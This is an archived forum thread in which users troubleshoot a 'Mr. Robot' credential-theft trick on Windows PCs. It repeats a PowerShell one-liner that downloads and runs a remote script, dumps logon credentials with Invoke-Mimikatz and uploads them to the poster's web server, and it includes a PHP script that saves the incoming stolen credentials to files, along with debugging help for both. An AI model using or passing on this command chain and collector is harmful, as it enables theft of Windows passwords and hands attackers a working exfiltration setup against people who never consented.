Jump to content

Archived

This topic is now archived and is closed to further replies.

Exmix

15 Second Mr. Robot Hack question

Recommended Posts

So thanks to ThoughtfulDev I was able to get this workings very nicely.

So after testing it on mine and my cousinsg Windows 7 PC(With his permission of course), those worked great, but when testing with our Windows 10 PC's, I got an error.

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

I tried this on a few other Windows 10 PC's to make sure it wasn't just those PC's in specific. I was wondering if anyone else has gotten this or might know a way around this or a possible fix.

Share this post


Link to post
Share on other sites

so, from the Minikatz github site:
https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).


Are you sure your running it as Administrator?

Share this post


Link to post
Share on other sites
On 9/6/2017 at 11:00 PM, kdodge said:

 

Are you sure your running it as Administrator?

100% Positive. I'm doing it from my Windows10 Laptop, running this script from an administrator command prompt.

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

With that I still get the Output I put in my first post.

Share this post


Link to post
Share on other sites

It could be a bug, you might try contacting the author.

One other thing I can think of, are you running an AV? the description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. I kinda sounds like something is anyway.

Share this post


Link to post
Share on other sites
1 hour ago, kdodge said:

It could be a bug, you might try contacting the author.

One other thing I can think of, are you running an AV? the description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. I kinda sounds like something is anyway.

I am but that is disabled. I know the AV Detects it.

Contacting the ower - I posted it here since it was @Darren Kitchen who made the Youtube video on it.

Share this post


Link to post
Share on other sites
On 9/8/2017 at 11:49 PM, Exmix said:

I am but that is disabled. I know the AV Detects it.

Contacting the ower - I posted it here since it was @Darren Kitchen who made the Youtube video on it.

Windows 10 has patched lsass now which effectively breaks mimikatz functionality.

Share this post


Link to post
Share on other sites

I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: 

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

Here is the PHP script:

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input"));
?>

 

it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference):

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";

file_put_contents($file, file_get_contents("php://input"));
?>
 

Thanks to any who reply!

Share this post


Link to post
Share on other sites

It could be a lot of things, but you should start with checking if the file has write permissions to the server your running this on

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.';
?>

run tcpdump with this to see if it's not writable.

Share this post


Link to post
Share on other sites
On 11/19/2017 at 1:25 PM, kdodge said:

It could be a lot of things, but you should start with checking if the file has write permissions to the server your running this on


<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.';
?>

run tcpdump with this to see if it's not writable.

Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));

 

So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...